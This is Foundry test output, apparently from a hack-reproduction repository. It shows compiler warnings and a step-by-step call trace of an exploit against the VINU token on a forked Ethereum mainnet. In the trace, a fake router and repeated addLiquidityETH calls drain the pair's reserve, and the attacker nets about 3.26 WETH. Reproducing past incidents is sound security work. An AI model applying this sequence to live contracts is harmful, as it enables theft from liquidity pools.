Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.22s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-06/VINU_exp.sol:22:5:
   |
22 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-06/VINU_exp.sol:83:5:
   |
83 |     function WETH() external view returns (address) {
   |     ^ (Relevant source part starts here and spans across multiple lines).
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2023-06/VINU_exp.sol:63:9:
   |
63 |         flashbotsAddress.call{value: 0.000000001 ether}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/VINU_exp.sol:87:22:
   |
87 |     function approve(address spender, uint256 amount) external returns (bool) {
   |                      ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/VINU_exp.sol:87:39:
   |
87 |     function approve(address spender, uint256 amount) external returns (bool) {
   |                                       ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/VINU_exp.sol:91:25:
   |
91 |     function createPair(address tokenA, address tokenB) external returns (address) {
   |                         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/VINU_exp.sol:91:41:
   |
91 |     function createPair(address tokenA, address tokenB) external returns (address) {
   |                                         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/VINU_exp.sol:96:9:
   |
96 |         address token,
   |         ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/VINU_exp.sol:97:9:
   |
97 |         uint256 amountTokenDesired,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/VINU_exp.sol:98:9:
   |
98 |         uint256 amountTokenMin,
   |         ^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/VINU_exp.sol:99:9:
   |
99 |         uint256 amountETHMin,
   |         ^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-06/VINU_exp.sol:100:9:
    |
100 |         address to,
    |         ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-06/VINU_exp.sol:101:9:
    |
101 |         uint256 deadline
    |         ^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2023-06/VINU_exp.sol:83:5:
   |
83 |     function WETH() external view returns (address) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2023-06/VINU_exp.sol:87:5:
   |
87 |     function approve(address spender, uint256 amount) external returns (bool) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2023-06/VINU_exp.sol:91:5:
   |
91 |     function createPair(address tokenA, address tokenB) external returns (address) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2023-06/VINU_exp.sol:95:5:
   |
95 |     function addLiquidityETH(
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 876.00ms (3.70ms CPU time)

Ran 1 test for src/test/2023-06/VINU_exp.sol:VinuTest
[PASS] testExploit() (gas: 576623)
Logs:
  Attacker's contract ETH balance before attack: 0.500000000000000000
  Attacker's contract WETH balance before attack: 0.000000000000000000
  Attacker's contract ETH balance after attack: 0.399999999000000000
  Attacker's contract WETH balance after attack: 3.256513152378912968

Traces:
  [16315] VinuTest::setUp()
    ├─ [0] VM::deal(VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000 [5e17])
    │   └─ ← [Return]
    ├─ [0] VM::createSelectFork("mainnet", 17421006 [1.742e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], "VINU")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(UniswapV2Router02: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], "UniswapV2Router02")
    │   └─ ← [Return]
    ├─ [0] VM::label(flashbotsAddress: [0xDAFEA492D9c6733ae3d56b7Ed1ADB60692c98Bc5], "flashbotsAddress")
    │   └─ ← [Return]
    └─ ← [Stop]

  [624823] VinuTest::testExploit()
    ├─ emit log_named_decimal_uint(key: "Attacker's contract ETH balance before attack", val: 500000000000000000 [5e17], decimals: 18)
    ├─ [2534] WETH::balanceOf(VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker's contract WETH balance before attack", val: 0, decimals: 18)
    ├─ [151778] UniswapV2Router02::swapExactETHForTokens{value: 100000000000000000}(0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1686049683 [1.686e9])
    │   ├─ [2504] 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8::getReserves() [staticcall]
    │   │   └─ ← [Return] 3331124883166006871 [3.331e18], 481195916974392513 [4.811e17], 1686049235 [1.686e9]
    │   ├─ [23974] WETH::deposit{value: 100000000000000000}()
    │   │   ├─ emit Deposit(dst: UniswapV2Router02: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], wad: 100000000000000000 [1e17])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   └─ ← [Stop]
    │   ├─ [8062] WETH::transfer(0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, 100000000000000000 [1e17])
    │   │   ├─ emit Transfer(from: UniswapV2Router02: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], to: 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, value: 100000000000000000 [1e17])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x000000000000000000000000000000000000000000000000016345785d8a0000 → 0
    │   │   │   @ 0xc418e5933b7f2281e2ff4b8909a1fa29d4466915653f93175cf16f82237fe576: 0x0000000000000000000000000000000000000000000000002e3a886ea3930e57 → 0x0000000000000000000000000000000000000000000000002f9dcde7011d0e57
    │   │   └─ ← [Return] true
    │   ├─ [100543] 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8::swap(0, 13983585451343353 [1.398e16], VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [65588] VINU::transfer(VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 13983585451343353 [1.398e16])
    │   │   │   ├─ [27477] 0xBd21422d8dDd57CfFAE72587169A22b2462dC761::swapExactTokensForETHSupportingFeeOnTransferTokens(0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 13983585451343353 [1.398e16])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x00000000000000000000000000000000000000000000000000000000647f132f
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000031adff33837df90000000000000000000000000000000000000000000000000031adff33837df9
    │   │   │   ├─ emit Transfer(from: 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, to: VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 13983585451343353 [1.398e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000000031adff33837df9
    │   │   │   │   @ 0x4ebb83c8679b471ea4df2786efd4eefeab7eb3032b8c9427ea4ed736430b1bd5: 0x00000000000000000000000000000000000000000000000006ad8d2312a084c1 → 0x000000000000000000000000000000000000000000000000067bdf23df1d06c8
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] WETH::balanceOf(0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8) [staticcall]
    │   │   │   └─ ← [Return] 3431124883166006871 [3.431e18]
    │   │   ├─ [598] VINU::balanceOf(0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8) [staticcall]
    │   │   │   └─ ← [Return] 467212331523049160 [4.672e17]
    │   │   ├─ emit Sync(reserve0: 3431124883166006871 [3.431e18], reserve1: 467212331523049160 [4.672e17])
    │   │   ├─ emit Swap(sender: UniswapV2Router02: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 100000000000000000 [1e17], amount1In: 0, amount0Out: 0, amount1Out: 13983585451343353 [1.398e16], to: VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x000000000000000000000000000000000068305c7fd0ad61f21c290eae5367c8 → 0x00000000000000000000000000000000009a7585abad7745369ec86fc4a32ea4
    │   │   │   @ 10: 0x0000000000000000000000000000000009febb13121e9ccaff1d7f0d571da6b4 → 0x000000000000000000000000000000001367cb4c5ad0c562e5f53bc741e89014
    │   │   │   @ 8: 0x647f11d300000000000006ad8d2312a084c10000000000002e3a886ea3930e57 → 0x647f132f000000000000067bdf23df1d06c80000000000002f9dcde7011d0e57
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [100000000000000000 [1e17], 13983585451343353 [1.398e16]]
    ├─ [198843] → new Router@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   └─ ← [Return] 993 bytes of code
    ├─ [58509] VINU::addLiquidityETH(Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8)
    │   ├─ emit Transfer(from: 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, to: VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], value: 373769865218439328 [3.737e17])
    │   ├─ emit Approval(owner: VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], spender: Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 1000000000000000000 [1e18])
    │   ├─ [401] Router::factory() [staticcall]
    │   │   └─ ← [Return] Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]
    │   ├─ [380] Router::WETH() [staticcall]
    │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   ├─ [950] Router::createPair(VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2])
    │   │   └─ ← [Return] Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]
    │   ├─ [1823] Router::addLiquidityETH(VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], 373769865218439328 [3.737e17], 0, 0, VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1686049583 [1.686e9])
    │   │   └─ ← [Return] 0, 0, 0
    │   ├─ [795] Router::approve(Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x4ebb83c8679b471ea4df2786efd4eefeab7eb3032b8c9427ea4ed736430b1bd5: 0x000000000000000000000000000000000000000000000000067bdf23df1d06c8 → 0x000000000000000000000000000000000000000000000000014bf96d9305ce28
    │   │   @ 0x07879e2a12f4e0802cf79165a6867ef144b7e0f7376232a1ac904e6eadcc04a9: 0 → 0x000000000000000000000000000000000000000000000000052fe5b64c1738a0
    │   │   @ 0x59c4f75ba93f34bcbf3f6d3cd84926b728971123462eea601bf87c09fc97857b: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   └─ ← [Stop]
    ├─ [12509] VINU::addLiquidityETH(Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8)
    │   ├─ emit Transfer(from: 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, to: VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], value: 74753973043687865 [7.475e16])
    │   ├─ emit Approval(owner: VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], spender: Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 1000000000000000000 [1e18])
    │   ├─ [401] Router::factory() [staticcall]
    │   │   └─ ← [Return] Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]
    │   ├─ [380] Router::WETH() [staticcall]
    │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   ├─ [950] Router::createPair(VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2])
    │   │   └─ ← [Return] Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]
    │   ├─ [1823] Router::addLiquidityETH(VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], 74753973043687865 [7.475e16], 0, 0, VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1686049583 [1.686e9])
    │   │   └─ ← [Return] 0, 0, 0
    │   ├─ [795] Router::approve(Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x4ebb83c8679b471ea4df2786efd4eefeab7eb3032b8c9427ea4ed736430b1bd5: 0x000000000000000000000000000000000000000000000000014bf96d9305ce28 → 0x00000000000000000000000000000000000000000000000000426515ea345c6f
    │   │   @ 0x07879e2a12f4e0802cf79165a6867ef144b7e0f7376232a1ac904e6eadcc04a9: 0x000000000000000000000000000000000000000000000000052fe5b64c1738a0 → 0x00000000000000000000000000000000000000000000000001099457a8d171b9
    │   └─ ← [Stop]
    ├─ [12509] VINU::addLiquidityETH(Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8)
    │   ├─ emit Transfer(from: 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, to: VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], value: 14950794608737573 [1.495e16])
    │   ├─ emit Approval(owner: VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], spender: Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 1000000000000000000 [1e18])
    │   ├─ [401] Router::factory() [staticcall]
    │   │   └─ ← [Return] Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]
    │   ├─ [380] Router::WETH() [staticcall]
    │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   ├─ [950] Router::createPair(VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2])
    │   │   └─ ← [Return] Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]
    │   ├─ [1823] Router::addLiquidityETH(VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], 14950794608737573 [1.495e16], 0, 0, VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1686049583 [1.686e9])
    │   │   └─ ← [Return] 0, 0, 0
    │   ├─ [795] Router::approve(Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x07879e2a12f4e0802cf79165a6867ef144b7e0f7376232a1ac904e6eadcc04a9: 0x00000000000000000000000000000000000000000000000001099457a8d171b9 → 0x00000000000000000000000000000000000000000000000000351dab21c37d25
    │   │   @ 0x4ebb83c8679b471ea4df2786efd4eefeab7eb3032b8c9427ea4ed736430b1bd5: 0x00000000000000000000000000000000000000000000000000426515ea345c6f → 0x000000000000000000000000000000000000000000000000000d476ac870df4a
    │   └─ ← [Stop]
    ├─ [12509] VINU::addLiquidityETH(Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8)
    │   ├─ emit Transfer(from: 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, to: VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], value: 2990158921747515 [2.99e15])
    │   ├─ emit Approval(owner: VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], spender: Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 1000000000000000000 [1e18])
    │   ├─ [401] Router::factory() [staticcall]
    │   │   └─ ← [Return] Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]
    │   ├─ [380] Router::WETH() [staticcall]
    │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   ├─ [950] Router::createPair(VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2])
    │   │   └─ ← [Return] Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]
    │   ├─ [1823] Router::addLiquidityETH(VINU: [0xF7ef0D57277ad6C2baBf87aB64bA61AbDd2590D2], 2990158921747515 [2.99e15], 0, 0, VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1686049583 [1.686e9])
    │   │   └─ ← [Return] 0, 0, 0
    │   ├─ [795] Router::approve(Router: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x4ebb83c8679b471ea4df2786efd4eefeab7eb3032b8c9427ea4ed736430b1bd5: 0x000000000000000000000000000000000000000000000000000d476ac870df4a → 0x0000000000000000000000000000000000000000000000000002a7e22816930f
    │   │   @ 0x07879e2a12f4e0802cf79165a6867ef144b7e0f7376232a1ac904e6eadcc04a9: 0x00000000000000000000000000000000000000000000000000351dab21c37d25 → 0x000000000000000000000000000000000000000000000000000a9f88a05a4c3b
    │   └─ ← [Stop]
    ├─ [7650] 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8::sync()
    │   ├─ [534] WETH::balanceOf(0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8) [staticcall]
    │   │   └─ ← [Return] 3431124883166006871 [3.431e18]
    │   ├─ [598] VINU::balanceOf(0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8) [staticcall]
    │   │   └─ ← [Return] 747539730436879 [7.475e14]
    │   ├─ emit Sync(reserve0: 3431124883166006871 [3.431e18], reserve1: 747539730436879 [7.475e14])
    │   ├─  storage changes:
    │   │   @ 8: 0x647f132f000000000000067bdf23df1d06c80000000000002f9dcde7011d0e57 → 0x647f132f0000000000000002a7e22816930f0000000000002f9dcde7011d0e57
    │   └─ ← [Stop]
    ├─ [598] VINU::balanceOf(VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 13983585451343353 [1.398e16]
    ├─ [598] VINU::balanceOf(VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 13983585451343353 [1.398e16]
    ├─ [11024] VINU::transfer(0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, 13983585451343353 [1.398e16])
    │   ├─ [6113] 0xBd21422d8dDd57CfFAE72587169A22b2462dC761::swapExactTokensForETHSupportingFeeOnTransferTokens(VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, 13983585451343353 [1.398e16])
    │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000031adff33837df90000000000000000000000000000000000000000000000000031adff33837df9
    │   ├─ emit Transfer(from: VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, value: 13983585451343353 [1.398e16])
    │   ├─  storage changes:
    │   │   @ 0x4ebb83c8679b471ea4df2786efd4eefeab7eb3032b8c9427ea4ed736430b1bd5: 0x0000000000000000000000000000000000000000000000000002a7e22816930f → 0x000000000000000000000000000000000000000000000000003455e15b9a1108
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000031adff33837df9 → 0
    │   └─ ← [Return] true
    ├─ [504] 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8::getReserves() [staticcall]
    │   └─ ← [Return] 3431124883166006871 [3.431e18], 747539730436879 [7.475e14], 1686049583 [1.686e9]
    ├─ [0] flashbotsAddress::fallback{value: 1000000000}()
    │   └─ ← [Stop]
    ├─ [1021] UniswapV2Router02::getAmountOut(13983585451343353 [1.398e16], 747539730436879 [7.475e14], 3431124883166006871 [3.431e18]) [staticcall]
    │   └─ ← [Return] 3256513152378912968 [3.256e18]
    ├─ [36401] 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8::swap(3256513152378912968 [3.256e18], 0, VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [23162] WETH::transfer(VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3256513152378912968 [3.256e18])
    │   │   ├─ emit Transfer(from: 0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8, to: VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3256513152378912968 [3.256e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0xc418e5933b7f2281e2ff4b8909a1fa29d4466915653f93175cf16f82237fe576: 0x0000000000000000000000000000000000000000000000002f9dcde7011d0e57 → 0x000000000000000000000000000000000000000000000000026c5871ab2e4d8f
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000002d31757555eec0c8
    │   │   └─ ← [Return] true
    │   ├─ [534] WETH::balanceOf(0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8) [staticcall]
    │   │   └─ ← [Return] 174611730787093903 [1.746e17]
    │   ├─ [598] VINU::balanceOf(0xa8AF8ac7aCd97095c0d73eD51E30564d52b19cd8) [staticcall]
    │   │   └─ ← [Return] 14731125181780232 [1.473e16]
    │   ├─ emit Sync(reserve0: 174611730787093903 [1.746e17], reserve1: 14731125181780232 [1.473e16])
    │   ├─ emit Swap(sender: VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 13983585451343353 [1.398e16], amount0Out: 3256513152378912968 [3.256e18], amount1Out: 0, to: VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x647f132f0000000000000002a7e22816930f0000000000002f9dcde7011d0e57 → 0x647f132f000000000000003455e15b9a1108000000000000026c5871ab2e4d8f
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "Attacker's contract ETH balance after attack", val: 399999999000000000 [3.999e17], decimals: 18)
    ├─ [534] WETH::balanceOf(VinuTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 3256513152378912968 [3.256e18]
    ├─ [444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker's contract WETH balance after attack", val: 3256513152378912968 [3.256e18], decimals: 18)
    ├─  storage changes:
    │   @ 12: 0 → 1
    │   @ 0x4ebb83c8679b471ea4df2786efd4eefeab7eb3032b8c9427ea4ed736430b1bd5: 0x0000000000000000000000000000000000000000000000000002a7e22816930f → 0x000000000000000000000000000000000000000000000000003455e15b9a1108
    │   @ 35: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.92s (13.25s CPU time)

Ran 2 test suites in 16.12s (15.80s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
